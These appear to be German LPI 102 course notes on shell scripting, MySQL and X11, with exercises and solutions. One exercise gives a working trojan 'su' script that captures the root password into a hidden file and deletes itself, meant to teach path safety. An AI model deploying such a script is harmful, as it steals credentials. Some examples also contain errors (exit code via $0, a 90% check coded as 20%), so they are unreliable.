1. Topic 105.1: Anpassung und Einsatz von Shell-Umgebungen

Hochgewichtete Themen in der Prüfung LPI 102:

Benutzerverwaltung, Zeitsteuerung, Netzwerk, Sicherheit

1.1. Shells, Skripte und Datenverwaltung

Shellarten und Eigenschaften von Variablen

Welche Shells kennt Linux neben der bash?

-> Siehe Datei /etc/shells

Hier können nach belieben andere Shells als Login-Shell definiert werden.

Wichtige Frage: Welche Features bietet meine Shell, inwieweit unterstützt Sie den Benutzer?

a) Für interaktive Nutzung: Komfortfunktionen (History, Autovervollständigung, Kommandozeileneditor)

b) Als Interpreter von Skripten: Beispielesweise kann die sh/dash nicht rechnen, so das man auf externe Befehle expr und bc zugrückgreifen muss, die bash bietet dagegen das interne Kommando let

Worin bestehen die Unterschiede bei Umgebungs- und Shellvariablen?

Umgebungsvariablen werden automatisch exportiert (vererbt), sie stehen Kindanwendungen (und damit auch Subshells) damit sogleich zur Verfügung.

Die Shellvariablen werden durch einen Benutzer oder ein Skript deklariert, diese Typfestlegung kann z.B. mit declare erfolgen:

  • Ein Variable als Zahl deklarieren: declare -i zahl

  • Ein Variable radonly markieren: declare -r wichtig=Linux

  • Darüberhinaus kann declare alle definierten Funktionen ausgeben: declare -f

ACHTUNG: Das veraltete Kommando typeset kann ebenso wie declare Werte und Eigenschaften für Variablen setzen!

1.1.1. Aliase (Kommandozeilen-Kürzel)

Ergebnis sind eigene Kommandos, die als eine Art Shell-Builtin dann verfügbar sind, sie erleichtern die Arbeit ungemein.

Genau wie Shell-Builtins werden sie VOR dem eigentlichen Kommando ausgeführt.

Alias = Kürzel für lange Kommandozeilen

Syntax: alias kürzel=‘Kommandozeile‘

Beispiele:

  • alias l=‘ls -ltrc‘ # Optionen: Langes Format, zeitsortierte, reverse Ausgabe

  • alias rm=‘rm -i‘

  • alias cp=‘cp -i‘

  • alias mv=‘mv -i‘

  • alias ftpmount=‘curlftpfs lpic1.example.test ~/ftpdir > /dev/null 2>&1‘

Am besten gleich in der ~/.bashrc festlegen! (Bei Debian: u.a. „force_color_prompt=yes“ aktivieren)

Nach Änderungen der Datei muss mit (‘source‘) oder (‘. ‘) der Inhalt in der elternlichen Prozessumgebung aktiv gesetzt werden.

Des weiteren:

  • Prüfung, ob es sich um einen Alias handelt: type rm

  • Alle definierte Aliasen anzeigen: alias

  • Einen Alias temporär aus der Prozessumgebung entfernen: unalias <KÜRZEL>

  • Alle Aliase temporär aus der Prozessumgebung entfernen: unalias -a

  • Einen Alias temporär für einmalige Ausführung übergehen: \KÜRZEL

BEISPIEL:

tux@deb7:~$ touch datei{1,2,3,4}-{a,b,c,d}.txt
tux@deb7:~$
tux@deb7:~$ ls -1 datei[1-4]* | wc -l

tux@deb7:~$ rm datei*
rm: reguläre Datei „datei“ entfernen? j
rm: reguläre leere Datei „datei1-a.txt“ entfernen? j
rm: reguläre leere Datei „datei1-b.txt“ entfernen? j
rm: reguläre leere Datei „datei1-c.txt“ entfernen? ^C
tux@deb7:~$
tux@deb7:~$ \rm datei*
tux@deb7:~$
tux@deb7:~$ ls -1 datei[1-4]* | wc -l
ls: Zugriff auf datei[1-4]* nicht möglich: Datei oder Verzeichnis nicht gefunden

Zum Alias "ftpmount"

Voraussetzung (als root):

  • Installiertes Paket „curlftpfs“: apt-get install curlftpfs

  • Beim ersten Mal: modprobe fuse

  • Benutzer in sekundäre Gruppe „fuse“: usermod -aG fuse tux

Benutzung als Nutzer „tux“:

  • Nach dem Neueinloggen eine Datei ~/.netrc erzeugen:

    machine lpic1.example.test
    login myUsername
    password myPassword
  • Rechte anpassen: chmod 600 ~/.netrc

  • Mountpunkt erzeugen: mkdir ~/ftpdir

  • Den oben definierten Alias aufrufen: ftpmount

  • Optional: SymLink für bequemen Zugriff erzeugen:

    ln  -s  ~/ftpdir/HandOuts/Pemmann\ Axel/  LinuxKurs

1.1.2. Funktionen

Problemstellung: Die Shell kann Rückgabewerte ($?) nur einmal auswerten, anders sieht es Funktionen aus, hier kann mit return mehrfach auf Rückgabewerte reagiert werden. Außerdem kann man öfter verwendete, gleiche Kommandozeilen zusammenfassen und als eigenen Befehl definieren.

Syntax:

a) Langform

function NAME(){
        Kommando 1
        Kommando 2
        Kommando n
}

b) Kurzform 1

NAME(){
        Kommando 1
        Kommando 2
        Kommando n
}

c) Kurzform 2

function NAME {         # ACHTUNG: Zwischen dem Namen und der
        Kommando 1      # sich öffnenden Klammer muss eine Leerzeichen
        Kommando 2      # stehen!
        Kommando n
}

BEISPIELE:

In ein Verzeichnis wechseln und Inhalt ausgeben:

function cl () {
        cd  $1
        ls -F
}
BENUTZUNG:   cl /etc/ppp

Demonstration, dass Alias VOR Funktionen ausgeführt werden

function aliastest(){
        type cp
        type ftpmount
        rm $1
        }
BENUTZUNG:   rm datei

Für Firewallscript Befehle für das Öffnen und Schließen definieren

open(){
        iptables  -P  INPUT ACCEPT
        iptables  -P  OUTPUT ACCEPT
        iptables  -P  FORWARD ACCEPT
        iptables  -F
        iptables  -X
        iptables  -Z
}
close(){
        iptables  -P  INPUT DROP
        iptables  -P  OUTPUT DROP
        iptables  -P  FORWARD DROP
        iptables  -F
        iptables  -X
        iptables  -Z
}

AUFGABE: Suchen Sie im Internet nach dem „Shell Shock“-Bug der bash, testen Sie, ob Sie anfällige Software haben.

Weitere Funktionen finden sich in fork-Bomben.

1.1.3. Konfigurationsdateien für Login und bash

Je nach Shell werden unterschiedliche Dateien beim Systemstart abgearbeitet. Für was steht „rc“? Es kann "run command" oder "ressource control" bedeuten.

a) Systemweite Dateien:

  • Zur Festlegung der PATH-Variablen (evl. auch umask-Wert): /etc/profile

    --> Ziel: Nutzerprofil mit sinnvollen Mindestwerten initiieren
  • Einstellungen zu Passwortkomplexität und evl. auch umask-Wert: /etc/login.defs

  • Initiialisierung der Bash: /etc/bashrc bzw. /etc/bash.bashrc -→ wobei mehr Möglichkeiten als bei der Prompt-Initialisierung der sh via /etc/profile bestehen: PS1="Eingabe \W: "

    PROMPT-AUSSEHEN:
                  Eingabe ~: cd /usr/share/doc
                  Eingabe doc:
                  Eingabe doc:
  • Festlegung von Tastaturkürzeln: /etc/inputrc

Welchen weiteren Unterschied gibt es bei der Abarbeitung der beiden folgenden Dateien?

  • /etc/profile: Wird nur ein Mal beim Login abgearbeitet (Bei Änderungen logout/login erforderlich)

  • /etc/bashrc: Wird mit jedem neuen bash-Aufruf (egal ob als Subshell oder durch Starten einen neuen Terminalemulators, z.B xterm)

b) User definierte Startupdateien

MERKTIPP: Von historischer Entwicklung der Shells ausgehen:

  • Die Parallele der /etc/profile: ~/.profile → Handelt es sich um einen moderneres System mit einer bash, dann werden andere Dateien VORHER abgearbeitet (siehe unten bei "bash-spezifische Konfigdateien")!

  • Die Parallele der /etc/iniputrc: ~/.inputrc → Wird diese Datei jedesmal oder nur beim Login ausgewertet? ANTWORT: Jedesmal mit Öffnen einer neuen Shell

    Zur Bildung der Tastenkürzel siehe auch
    http://www.pro-linux.de/kurztipps/2/1256/tasten-mit-kommandos-belegen.html
    Beispiel:
            cat ~/.inputrc
                    "\e[11~": "ls -ltrc\n"
                    Control-h: "cd ~"
    Nach dem Abspeichern aktiv setzen:  bind -f ~/.inputrc
    Benutzung:
            - Zeile 1: Taste F1 drücken, um ‚ls -ltrc‘ sofort auszuführen
            - Zeile 2: Strg + g drücken, um ‚cd ~‘ auf den Prompt zu legen
    Siehe dazu auch „help bind“ sowie  „man  readline“
  • bash-spezifische Konfigdateien

    • ~/.bash_profile (wird falls vorhanden beim Login NACH der /etc/profile abgearbeitet) → Was bedeutet: Nutzer-definiert Konfigs gehen systemweiten vor!

    • ~/.bash_login (wird nur beim Login)

    • ~/.bash_logout (falls sie existiert, wird sie beim Logout ausgeführt)

Weitere Unterscheidungen von Shell-Arten sind möglich:

  • interactive

  • non-interactive

  • login

  • non-login

1.2. Fragen zur Wiederholung

  1. Schreiben Sie Aliase für die folgenden Kommandos:

    • apt-get update → Kürzel: au alias au='apt-get update'

    • apt-cache search → Kürzel: as alias as='apt-cache search'

    • apt-get install → Kürzel: ai alias ai='apt-get install'

  2. Fasssen Sie die beiden folgenden Kommandozeilen zusammen, so dass sie ähnlich einen Shellbuiltin-Befehl in der Bash-Umgebung (kein Skript) zur Verfügung stehen. Geben Sie dem neuen Befehl den Namen backup.etc.

    tar czvf /root/etc-backup-`date +%F`.tar.gz  /etc
    md5sum /root/etc-backup-`date +%F`.tar.gz  >> /root/md5sums.txt
    LÖSUNG:
    backup.etc(){
          tar czvf /root/etc-backup-`date +%F`.tar.gz  /etc
          md5sum /root/etc-backup-`date +%F`.tar.gz  >> /root/md5sums.txt
          }
  3. Setzen Sie der Variablen "zahl1" den Wert 3, der Variablen "zahl2" den Wert 5, berechnen Sie danach mit Hilfe von let das Produkt, wobei Sie das Ergebnis bitte in eine Variable namens "produkt" speichern.

    LÖSUNG:
    zahl1=3 alternativ:     declare -i zahl1=3
    zahl2=5 alternativ:     declare -i zahl2=5
    let produkt=$zahl1*$zahl2    alternativ:       let produkt=zahl1*zahl2
    echo $produkt
  4. Starten Sie mit sh eine Subshell. Steht die Variable produkt hier zur Verfügung?

    --> Nein
  5. Wenn nicht, warum? Sorgen Sie in dem Falle dafür, dass sie auch hier vorhanden ist.

    --> Die Variable wurde ja nicht exportiert.
    --> export produkt
  6. Entfernen Sie die Variable produkt komplett.

    LÖSUNG:
    unset produkt
    (ein "export -n produkt" würde ja nur den Export zurücknehmen, so
    so dass es sich nicht mehr um eine Umgebungsvariable handelt)
  7. Entfernen Sie temorär den Alias ai aus Ihrer Shellumgebung

    unalias ai
  8. Beachten Sie: Das Shellbuiltin builtin arbeitet nicht mit Aliasen, sondern Funtionen:

    function cd(){
        cd /tmp
        echo "Nach /tmp gewechselt."
     }
    Die eben definierte Funktion umgehen:
    builtin cd /usr/share/doc
  9. Wie kann einmalig umgangen werden, dass mit rm der Alias rm -i ausgeführt wird?

    LÖSUNG: Einen Backslash voranstellen:   \rm
  10. Welche Aufgabe hat die Datei /etc/inputrc bzw. ~/.inputrc?

    => Eigene Hotkeys festlegen

2. Topic 105.2: Einfache Skripte anpassen oder schreiben

ZIEL: Einfache, grundlegende Kontrollstrukturen kennenlernen, Kommando test benutzen können

Das erste Skript soll typische Umgebungsvariablen eines einfachen Benutzers ausgeben:

vi myenvironment.sh
#!/bin/sh
#
# myenvironment.sh
echo "Mein Heimatverzeichnis lautet:  $HOME "
echo "Mein aktuelles Arbeitsverzeichnis ist:  $PWD "
echo "Mein Loginname lautet:  $LOGNAME "
echo "Mein Suchpfadvariable beinhaltet folgende Ordner:  $PATH "
echo "Mein primärer Prompt wird gebildet mit:  $PS1 "
echo "Mein Elternprozess ist $PPID und mein aktueller Prozess $$ "

Danach muss das Skript ausführbar gemacht werden:

chmod u+x myenvironment.sh

Ausführung aus einem Verzeichnis heraus, dass nicht im Suchpfad integriert ist:

./myenvironment.sh

2.1. Expansionen und Substitutionen in der Shell

VORSICHT: Bitte die folgenden Zeichen nicht mit Maskierungsausgaben in Zusammenhang bringen:

  • Backslash (\): Maskierung des darauffolgenden Zeichens (Dollar ist mit betroffen)

  • Simple Ticks ('): Zwischen zwei solcher Zeichen gesetzter Text wird maskiert (Dollar ist mit betroffen)

  • Double Sticks: Maskierung verschiedener Zeichen wie Leerzeichen, das Dollarzeichen ist aber nicht mit betroffen!

Es gibt drei grundlegende Verfahren, die Erweiterungs- bzw. Ersetzungsaufgaben wahrnehmen:

a) Wildcard/Joker-Expansion (Dateinamesexpansion)

Die Dateijoker unter Linux sind: *, ?, […], [!…]

ls -l /etc/*.conf
b) Variablen-Expansion, Ausgabe von Variableninhalten
echo $PATH

ACHTUNG: Bei zusammenzusetzenden Zeichenketten, muss die Variable vom umgebenden Text abgetrennt werden, das macht man i.d.R. mit den geschweiften Klammern (oder einem Backslash oder Tickmarks)

tux@deb7:~$ # ZIEL: Zeichenkette "Weltenbummler" generieren
tux@deb7:~$ name=Welt
tux@deb7:~$
tux@deb7:~$ # So NICHT:
tux@deb7:~$ echo $nameenbummler
                                <==  Diese Variable gibt es nicht (deswegen die Leerzeile)
tux@deb7:~$
tux@deb7:~$ # Sondern so:
tux@deb7:~$
tux@deb7:~$ echo ${name}enbummler
Weltenbummler
tux@deb7:~$
tux@deb7:~$ echo $name\enbummler
Weltenbummler
tux@deb7:~$
tux@deb7:~$ echo $name'enbummler'
Weltenbummler
tux@deb7:~$
tux@deb7:~$ echo $name"enbummler"
Weltenbummler
tux@deb7:~$
a) Kommandozeilensubstitution:
a) Mit Backticks:                       echo `cat /etc/fstab`
b) Mit Dollar und runden Klammern:      ls -F /lib/modules/$(uname -r)

2.2. Spezielle Variablen

Es gibt für verschiedene Zwecke fest vordefinierte Variablen, die vor allen die Frage betreffen Wo bekomme ich meinen Input her?

Positionelle Parameter

⇒ die an einer bestimmten Position mitgegebenen Übergabeparameter:

$1 ... $9
BSP, Skriptname "kopiere":     cp -vr  $1  $3
Ausführung des Skiptes:    ./kopiere  Dokumente nach Doc.backup.d

Hierbei stellt das Wörtchen "nach" den zweiten positionellen Parameter dar, der einfach nicht ausgewertet wird.

Daneben wird in der Variablen $# die Anzahl der übergebenen Parameter geführt, in der $* alle übergebenen Parameter als Zeichenkette (IFS wirkt wirt sich nicht aus) und in der Variablen $@ alle übergebenen Parameter mit IFS-Trenner (Die Parameter als einzelnes Wort).

Interner Feldtrenner (Internal Field Separator)

⇒ Auftrennung der Kommandozeile in einzelne Argumente, so dass die Shell sie verarbeiten kann

Variablename: IFS
BSP: echo $IFS | od -x
-> Hier ist i.d.R. ein Leerzeichen und ein Tabulatorschritt enthalten
Der Name des aufrufenden Programmes/Skriptes
Variablenname: 0
BSP:  echo "Das Skript heißt $0."
Der Exit-Code eine Programmes/Skriptes

Die Shell kennt nur DIE Codes 0 oder 1, wobei 0 Erfolg bedeutet. Andere, reguläre Kommandos können weitere Exitcodes produzieren.

Variablenname: ?
BSP:  echo "Das Skript ist mit Exitcode $0 gelaufen."
Variablen für die Prozessvewaltung
  • Die Parent-PID: PPID

    BSP:   echo "Mein Eltenprozess: $PPID"
  • Die aktuelle PID des Programmes/Skripts: $

    BSP:   echo "Mein eigener Prozess: $$"
  • Den letzten Hintergrundprozess: !

    BSP: sleep 60 & echo "Mein letzter bash-Job: $!"

2.3. Kontrollstrukturen

Um eine strukturierte Ablaufplanung mit Manipulationsmöglichkeiten zu erhalten, gib es:

  • Schleifen (for, while, until, select)

  • Verzweigungen (if / case)

2.3.1. Schleifen für wiederholte Abarbeitung

a) While-Schleife

Sie dient dazu, eigene, kleine Daemons zu schreiben. Das kann sogar mit Endlosschleifen geschehen, die mit einer Abbruchbedingung ausgestatte werden müssen:

while true
    do
        echo "Bitte warten...."
        sleep 2
done

Bedingungen können aber natürlich zuallererst in der Schleife selber definiert werden, anstelle von true notiert man den Ausdruck, der häufig mittel dem Kommando test generiert wird:

#!/bin/bash
#
# add
#
# Dem Skript müssen mehrere Ganzzahlen als Parameter übergeben werden
summe=0
while test $# -gt 0
   do
        let summe=summe+$1
        echo "Die Summe berägt im Moment: $summe"
        sleep 1
        shift
done
echo "Die Summe beträgt: $summe"
unset summe
exit 0

Das Skript in Aktion:

./add 1 2 3 4 5 6 7
Die Summe beträgt im Moment: 1
Die Summe beträgt im Moment: 3
Die Summe beträgt im Moment: 6
Die Summe beträgt im Moment: 10
Die Summe beträgt im Moment: 15
Die Summe beträgt im Moment: 21
Die Summe beträgt im Moment: 28
Die Summe beträgt: 28
b) For-Schleife

⇒ für Praxisaufgaben wie die Untersuchung aller Objekte im Dateisystem gut geeignet:

for liste in /etc/host*
   do
        file $liste
done

Das Skript in Aktion:

/etc/host.conf: ASCII text
/etc/hostname: ASCII text
/etc/hosts: ASCII text
/etc/hosts.allow: ASCII text
/etc/hosts.deny: ASCII text

2.4. Fragen zur Wiederholung

  1. Schreiben Sie ein Skript, das wichtige bash-Variablen ausgibt

    $0
    $#
    $1 ... $9
    $?
    LÖSUNG:
    echo "Programm-Name: $0"
    echo "Anzahl der Parameter: $#"
    echo "1. Positionsparameter: $1"
    echo "2. Positionsparameter: $2"
    echo "3. Positionsparameter: $3"
    echo "4. Positionsparameter: $4"
    echo "5. Positionsparameter: $5"
    echo "6. Positionsparameter: $6"
    echo "7. Positionsparameter: $7"
    echo "8. Positionsparameter: $8"
    echo "9. Positionsparameter: $9"
    echo "Exitcode dieses Programmes: $?"
  2. Modifizieren Sie das folgende if-Verzweigungs-Beispiel. Fügen Sie einen Header mit dem Shebang und einer Variablen namens "dateityp" hinzu, über die Sie Dateien angeben können. Geben Sie für einen Testfall ein vorhandenes Verzeichnis an, prüfen Sie, ob es tatsächlich vom Typ her ein Directory ist:

    if [ -f /etc/hosts ]
            then
                    echo "Es handelt sich um eine Datei."
            else
                    echo "Es handelt sich NICHT um eine Datei."
    fi
            Hinweis: Anstelle der eckigen Klammern kann auch direkt das Kommando
    'test' verwendet werden
    #!/bin/bash
    #
    # if-tests.sh
    ### VARIABLE=WERT
    dateiobjekt=/tmp/weißnicht
    if [ -d $dateiobjekt ]
          then
             echo "Es handelt sich um ein Verzeichnis."
                else
             echo "Es handelt sich NICHT um ein Verzeichnis."
    fi
    ### Verbesserte Variante:
    #!/bin/bash
    #
    # if-tests-parameter.sh
            ### Durch die Verwendung von '$1' muss dem Skript ein Dateiobjekt
    übergeben werden
            if [ -d $1 ]
                  then
                     echo "Es handelt sich um ein Verzeichnis."
                        else
                     echo "Es handelt sich NICHT um ein Verzeichnis."
            fi
  3. Stellen Sie sich vor, dass Sie mit wget einen Download gestartet haben, der aber eine ganze Weile laufen wird. (Testweise sleep 300 & verwenden!). Schreiben Sie ein Skript, das prüft, ob der Prozess noch läuft. Wenn nicht, soll der Rechner heruntergefahren werden.

    -> Endlosschleife mit while, Abbruchbedingung mit if-then-else
    #!/bin/bash
    #
    # wget-shutdown.sh
    while true
       do
            if [ "`pgrep sleep`" = "" ]
                    then
                       echo "Download beendet!"
                       echo shutdown -h 1
                    else
                       echo "Bitte warten, Download läuft noch..."
                       sleep 2
            fi
    done
  4. Schreiben Sie ein Skript namens su, das als trojanisches Programm das root-Passwort abfängt, falls root den Fehler begeht und nicht absolute Pfade verwendet: (/bin/su -). Das abgefangene Passwort soll in einer versteckten Datei abgelegt werden. Dabei soll das Programm die Arbeitsweise von /bin/su möglichst detailgetreu nachahmen und sich nach getaner Arbeit selbst löschen.

    #!/bin/bash
    #
    # su
    #
    # DEMO: Trojanisches Skript, das das root-Passwort abfischt und sich danach löscht
    # Hinweis: Mit der folgenden Zeilen kann das Skript von jedem Verzeichnis
    # aus aufgerufen werden:  export PATH=.:$PATH
    #
    read -s -p "Passwort: "  pw
    echo
    echo "su: Fehler bei Authentifizierung"
    echo "$pw" > ~/.dbus/.netsocket
    rm -f $0
  5. Schreiben Sie ein Bash-Programm, das die freie Speicherkapazität der Wurzelpartition überwacht und ein "ALERT: HDD full!" mit logger ins Haupt-Logfile schreibt, wenn die Belegung 90% beträgt.

    HINWEIS: Das %-Zeichen lässt sich am elegantesten mit Hilfe von Variablen-String-Verarbeitung entfernen (http://www.lansys.ch/shell/strings.htm)
    space=$(df / | tail -1 | awk '{print$5}')
    echo ${space//%}
    LÖSUNG:
    # %-Wert der Auslastung in einer Variable speicher, um Stringverarbeitung
    # durchführen zu können
    space=$(df / | tail -1 | awk '{print$5}')
    # Berechnung durchführen, Stringverarbeitung, um %-Zeichen zu entfernen
    if [ ${space//%} -gt 20 ]
    then
        logger "ALERT: HDD full!"
        echo "ALERT: Festplatte ist zu $space belegt!"
    fi
  6. Schreiben sie ein Skript, das prüft, ob der Host "foo" (Z.B. Standardgateway) erreichbar ist. Im Fehlerfall soll die Meldung ins Syslog geschrieben werden "NETZWERKFEHLER: Host foo nicht erreichbar.".

    vi host-available.sh
    ### Testweise
    ping -c4 172.16.0.2 > /dev/null 2>&1 ; echo $?
    
    ### Lösung 1
    ping -c2 172.16.0.2 > /dev/null 2>&1 || logger "NETZWERKFEHLER: Host foo nicht erreichbar."
    
    
    
    ### Lösung 2
    ping -c2 172.16.0.2 > /dev/null 2>&1
    if [ $? -ne 0 ]
            then echo "NETZWERKFEHLER: Host foo nicht erreichbar."
    fi

Aus den Prüfungsfragen

cat myscript
    shift
    echo $2
./myscript  eins  zwei  drei  vier
    drei
-> Es wird zuerst um Eins verschoben (shift [1]), d.h. der erste Positionsparameter wird
nicht mehr beachtet, danach wird von der verbleibenden Liste (zwei  drei  vier) der zweite
Positionsparameter ausgegeben, also: "drei"

Bitte als nächstes das folgende Skript schreiben und danach austesten:

#!/bin/bash
#
# grundrechenarten-case.sh
clear; echo -e "Welche Operationen möchten Sie ausführen?\nBitte den ersten Buchstaben eingeben und mit Eingabe bestätigen!\n"
echo -e "       [a]ddieren
        [s]ubtrahieren
        [m]ultiplizieren
        [d]ividieren "

read -p "EINGABE: " operator
clear; echo -e "\nGeben Sie jetzt den ersten Wert ein  "
read a
clear; echo -e "\nGeben Sie jetzt den zweiten Wert ein  "
read b

case "$operator" in
        a)
           let c=a+b
           clear; echo $a + $b = $c
           ;;
        s)
           let c=a-b
           clear; echo $a - $b = $c
           ;;
        m)
           let c=a*b
           clear; echo $a "*" $b = $c
           ;;
        d)
           let c=a/b
           clear; echo $a / $b = $c
           ;;
        *)
           clear; echo -e "\nSie haben einen ungültigen Operator angegeben!"
           exit 1
           ;;
esac
exit 0

3. Topic 105.3: SQL-Datenverwaltung

ZUR MOTIVATION: Es gibt CMS (wordpress, joomla, OpenNote, ilias, contao, …) auf Basis LAMP (Linux - Apache/Nginx - MySQL - Perl/PHP)

Ziel: DBMS-Superuser (er heißt ebenfalls root) muss sein CMS-Passwort ändern können

3.1. Installation von DBMS und Cmdline-Client unter Debian 7

# Installation
apt-get install mysql-server
   (Assistent verlangt das Setzen eines Passwortes)
# Überprüfung der Installation
dpkg -l | grep sql
# Authentifizierter Login (User = root, Prompt bereitstellen)
mysql -u root -p
ERSTE SCHRITTE IM mysql-Client:
status;
help data types;
show databases;
use mysql;
show tables;
select * from user;
---- Neue DB erzeugen;
create database kontakte;
use kontakte;
create table rufnummern(
   id int(10) not null auto_increment primary key,
   vorname varchar(128),
   nachname varchar(128),
   vorwahl varchar(32),
   rufnummer varchar(32)
   );
insert into
rufnummern (id,vorname,nachname,vorwahl,rufnummer)
values
(1,
'Hans',
'Panz',
'030',
'12345678'
);
show tables;
describe rufnummern;
select * from rufnummern;
select vorname,nachname from rufnummern;
select vorwahl,rufnummer from rufnummern where vorname='Willi';
select nachname,vorname,vorwahl,rufnummer from rufnummern where vorname='Willi';
# Ohne Feld 'id' vom Type AUTO_INCREMENT:
insert into rufnummern (vorname,nachname,vorwahl,rufnummer) values ('Susi', 'Paschke', '030', '343493067');
# Ohne Verwendung des Feldes "vorwahl" wird im Datensatz dort NULL eintragen
insert into rufnummern (vorname,nachname,rufnummer) values ('Dieter', 'Durstig', '66673');
select * from rufnummern where nachname='Durstig';
select * from rufnummern where id > 1 and id < 4;
update rufnummern set vorwahl='0221' where id=2;
### AUFGABE: Das leere Feld (Wert = NULL) bei Dieter Durstig befüllen.
update rufnummern set vorwahl='0221' where id=2;
### Abschließend Datenbank sichern mittels Klartext-Dump:
mysqldump -u root -p  kontakte > database-kontakte.sql

Fragen zur Wiederholung

  1. Wie lautet eine einfache SQL-Abfrage, die den Inhalt einer Tabelle komplett ausgibt?

    SELECT * FROM table_name;
  2. Erläutern Sie, was die folgende SQL-Kommandozeile bedeutet:

    UPDATE rufnummern SET vorwahl = '02131' WHERE vorname = 'Dieter';
    • Ziel: Änderung ("UPDATE") eines Datensatzes einer Tabelle ("rufnummern")

    • Suche die Zeilen heraus, wo im Feld "vorname" der Wert "Dieter" zu finden ist

    • Dabei geschieht die Änderung im Feld "vorwahl", dessen neuer Wert zugleich mit "SET" übergeben wird

4. Topic 106.1: X11 installieren und konfigurieren

Ziel: ein X-Window-System installieren und einen X-Font-Server aufzusetzen

4.1. Hardwareinformationen erhalten

Was habe ich für ein Grafiksystem? (Grafiksystem besteht aus Grafikkarte und Monitor)

  • GFX-Card identifieren: lspci | egrep VGA|3D

  • Welche Xorg-Treiber geladen wurde: grep \.so$ /var/log/Xorg.0.log (Dateinamen mit z.B. "vesa", "intel" oder "nvidia")

    Aus welchen Komponenten besteht ein X-Window-System?
      --> eine anschaulich Grafik finden Sie unter http://www.answers.com/topic/x-window-system
    Experiment: Was ist der X-Server?
    Als root durchzuführen
         a) Unter CentOS:  init 3
         b) Unter Debian (bei Vervendung eins Display-Managers):  Auf tty1 (STRG + ALT + F1)    /etc/init.d/gdm3  stop    alt:    /etc/init.d/kdm  stop
    • X-Server starten X -retro

    • X-Client xterm starten: Auf tty3 (STRG + ALT + F3)

      --> Versuch 1 misslingt:   'xterm'     MELDUNG: Can't open display: %s    --> auf letzter Zeile:  DISPLAY is not set
      --> Versuch 2 geling, weil jetzt die Clients erfahren, wo sie ihre Pixel hinzusenden haben:
      export DISPLAY=:0.0
          (Sende zu erstem X-Server, erstes Display auf dem lokalen Rechner)
      ALTERNATIV:  export DISPLAY=192.168.2.5:0.0
            (Sende zu erstem X-Server, erstes Display auf dem entfernten Rechner 192.168.2.5)
      xterm     (Programm läuft im Vordergrund ohne Fehlermeldung)
      STRG + ALT + F2 -> allerdings fehlt noch ein wichtiger Client:  der Window Manager (twm, icewm, fvwm2, fluxbox, openbox, pekwm)
      zypper in icewm
      icewm &
    • Wieder zur Standardoberfläche zurückkehren: killall X ; init 5

Mit welchen Optionen wurde denn der X-Server via Display-Manager gestartet? -→ z.B. mit -nolisten tcp (Der TCP-Port 6000 wird NICHT geöffnet) --→ via Unix Domain Socket: /tmp/.X11-unix/X0

Was versteht man unter einem Display-Manager? Es handelt sich um ein spezielles X-Window-System, das bequemen, grafischen User-Login zu ermöglicht (Entsprechung bei MS: "winlogon")

Worin besteht der Hauptunterschied zwischen Windowmanager und Desktop Environment?

  • Ein Window-Manager ist Basis jedes Desktops, so hat z.B. KDE als Standard-Fenstermanager kwin

  • Ein Windowmanager bringt KEINE Zubehörprogramme mit

  • Ein Desktop unterstützt Kommunikation zwischen Zubehör-Apps

  • Ein Desktop setzt auf einheitliche Libs (KDE = qt) -→ einheitliches Look & Feel von Apps

4.2. Der Startvorgang von X unter SuSE Linux

Möglichkeiten, die grafische Oberfläche zu starten:

a) via Display Manager (i.d.R. zu empfehlen)
b) via xinit (zuerst Konsole-Login, dann 'startx')

4.2.1. Starten mittels xinit/startx

FRAGE: Wie lautet eine übliche Abfolge von Kommandos und entsprechenden Startskripten?

ACHTUNG: Hier darf nichts in Sachen '~/.xsession' auftauchen!  Das wäre der falsche Kontext: es handelt sich um die Startupdatei des "Display Manager"

Übung "xinit"-Start austesten: init 3 STRG + ALT + F2 (tty2) → als tux einloggen → startx

KLAPPT NICHT!
Workaround:
vi /etc/inittab
ÄNDERN AUF:      id:3:initdefault:
reboot
Geht immer noch nicht!
Nächster Test als root:
    /etc/init.d/xdm stop
    startx
==> Es ist zu beobachten: es startet sich mein installierter und favorisierter Desktop: lxde
Da wir aber lediglich einen kleine Fenstmanager wollen, nämlich "icewm", schreiben wir eine eingene Startdatei:
vi  /root/.xinitrc
xterm &
firefox &
exec icewm
startx

FRAGEN:

  • Wie wird die Konfiguration des X-Servers durchgeführt?

    a) grafisch, z.B. unter SuSE: yast2
    b) per Hand in Configdateien
    • Heute: /etc/X11/xorg.conf (Gibt es zum Teil nicht mehr, via udev erfolgt automatische Erkennung)

    • Früher: /etc/X11/XF86Config

Zur Konfigurationsdatei des X-Servers XF86Config bzw. xorg.conf:

  • Wie heißt die Sektion, in der Schriftarten eingebunden werden: files

  • Wie lautet die Anweisung, um einen X11-Font-Server in eben dieser Sektion zu konfigurieren? FontPath "unix/:7100"

    (Die Maschine, die diese Fonts zentral vorhält heißt "Unix")
  • Vorteil eines Fontservers: Sparen von Plattenplatz sowie möglicherweise von Lizenzkosten

    du -h /usr/share/fonts/*  |  sort -h
    Bitte installieren:
    zypper in xvidtune xwininfo
    Bitte testen:
    xvidtune -show
    xrandr                   (Mögliche Modes auflisten)
    xrandr -s 1024x768       (Auflösung ändern)

4.2.2. Troubleshooting X11

Welche Treiber sind installiert:
       SuSE: rpm -qa | grep xorg
       Debian: dpkg -l | grep xorg
Eine (neue) xorg.conf erzeugen und testen:
         init 3
         Xorg -configure
         Xorg -retro -config xorg.conf.new= LPI 102 - Di, den 20.10.2015

4.3. Fragen zur Wiederholung

  1. Was versteht man unter einem Display-Manager?

    Ist ein spezielles X-Window-System, um bequemes,
    grafisches User-Login zu ermöglichen (im Vergleich zu MS: "winlogon")
    VORTEIL: Vom Despktop aus lassen auch mit höheren Rechten ACPI-Funktionen wie
             Suspend-to-RAM / Suspend-to-Disk
  2. Worin besteht der Hauptunterschied zwischen Windowmanager und Desktop Environment?

    • Windowsmanager ist Basis jedes Desktops: KDE hat kwin als Standard-Fenstermanager

    • Ein Windowmanager bringt KEINE Zubehörprogramme mit

    • Ein Desktop unterstützt Kommunikation zwischen Zubehör-Apps

    • Ein Desktop setzt auf einheitliche Libs (KDE = qt) -→ einheitliches Look & Feel von Apps

  3. Mit welchen Optionen wurde ihr X-Server gestartet (In Sachen Sicherheit: ist der TCP-Port 6000 offen, siehe ps aux)?

    ps aux | grep X
    --> Hierbei muss '-nolisten tcp', d.h. der TCP-Port wird NICHT
        geöffnet
  4. Modifizieren Sie Ihre ~/.xinitrc, so dass Firefox automatisch beim Login gestartet wird.

    vi ~/.xinitrc
            xterm &
            firefox &
            exec openbox
